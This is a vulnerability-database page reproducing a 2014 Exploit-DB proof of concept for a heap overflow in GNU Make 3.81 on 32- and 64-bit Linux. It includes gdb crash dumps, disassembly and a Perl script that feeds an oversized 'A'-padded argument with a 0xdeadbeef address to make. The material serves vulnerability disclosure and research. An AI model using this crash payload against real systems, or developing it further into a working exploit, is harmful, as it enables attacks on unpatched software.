Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Make 3.81 - Heap Overflow (PoC)

🗓️ 24 Jul 2014 00:00:00Reported by HyPType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 37 Views

Heap Overflow in Make 3.81 on Linux x86_x6

Code
=for comment
# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64
# Date: [14.07.14]
# Exploit Author: HyP
# Vendor Homepage: http://www.gnu.org/software/make/
# Software Link: http://ftp.gnu.org/gnu/make/
# Version: Make 3.81
# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)
# CVE : none

*******************************************************************************************
Special Thanks:

kmkz
Zadyree
Sec0d Team

*******************************************************************************************
*******************************************************************************************
32bits


./checksec.sh --file make
RELRO STACK CANARY NX PIE RPATH
RUNPATH FILE
No RELRO No canary found NX enabled No PIE No RPATH
No RUNPATH make


gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`


Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
...
EAX: 0xdeadbeef
EBX: 0x807b971 --> 0x6f2e ('.o')
ECX: 0x0
EDX: 0x1
ESI: 0xdeadbeef
EDI: 0x0
EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0
ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
EIP: 0x80548b2 (mov eax,DWORD PTR [eax])
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x80548aa: je 0x80548b8
0x80548ac: lea esi,[esi+eiz*1+0x0]
0x80548b0: mov esi,eax
=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing
0x80548b4: test eax,eax
0x80548b6: jne 0x80548b0
0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1
0x80548bf: mov DWORD PTR [ebp-0x10ac],edx
[------------------------------------stack-------------------------------------]
0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')
0008| 0xbfffa318 --> 0x2
0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")
0016| 0xbfffa320 --> 0x0
0020| 0xbfffa324 --> 0x0
0024| 0xbfffa328 --> 0x0
0028| 0xbfffa32c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080548b2 in ?? ()


Overflow code:
...
80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>
80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
80548b0: 89 c6 mov %eax,%esi
80548b2: 8b 00 mov (%eax),%eax
80548b4: 85 c0 test %eax,%eax
80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>
...


gdb-peda$ x/x $eax
0x807ff68: 0x00000000

peda vmmap
Start End Perm Name
0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make
0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make

0x08070000 0x08092000 rw-p [heap] // heap overflow !!



*******************************************************************************************
*******************************************************************************************
64bits


Overflow Code :
40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>
40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
40cc60: 48 89 c3 mov rbx,rax
40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow


Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xdeadbeefdeadbeef
RBX: 0xdeadbeefdeadbeef
RCX: 0x4242424242424242 ('BBBBBBBB')
RDX: 0x0
RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)
RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')
RBP: 0x7fffffffb930 --> 0x1
RSP: 0x7fffffff95f0 --> 0x0
RIP: 0x40cc63 (mov rax,QWORD PTR [rax])
R8 : 0x4242424242424242 ('BBBBBBBB')
R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])
R10: 0x4242424242424242 ('BBBBBBBB')
R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708
R12: 0x1
R13: 0x0
R14: 0x6397a0 --> 0x6f2e25 ('%.o')
R15: 0x0
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x40cc59: je 0x40cc6b
0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]
0x40cc60: mov rbx,rax
=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing
0x40cc66: test rax,rax
0x40cc69: jne 0x40cc60
0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1
0x40cc72: lea rdi,[rbp-0x40]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff95f0 --> 0x0
0008| 0x7fffffff95f8 --> 0x0
0016| 0x7fffffff9600 --> 0x0
0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b -->
0x5f7266006362696c ('libc')
0032| 0x7fffffff9610 --> 0xffffffdf
0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541
--> 0x5f726600656b616d ('make')
0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 -->
0x64667b --> 0x5f7266006362696c ('libc')
0056| 0x7fffffff9628 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040cc63 in ?? ()



*******************************************************************************************
*******************************************************************************************
Proof of Concept - Source code
*******************************************************************************************
*******************************************************************************************
=cut

#!/usr/bin/perl

use 5.010;
use strict;
use warnings;
say "Please set ulimit value to 1000 before (ulimit -c 1000) ";
sleep 0.5;


my $buff = "A"x 4096 ;
my $addr = "\xef\xbe\xad\xde";
my $make = "./make";
my $gdb = "gdb --core core";
my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);

my $exec= qx($make $PAYLOAD);

say " Reading Core file GDB ";
sleep 0.5;

system ($gdb);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jul 2014 00:00Current
7High risk
Vulners AI Score7
heap overflowmake 3.81linuxfedoradebianubuntuarchpointer dereferencing
37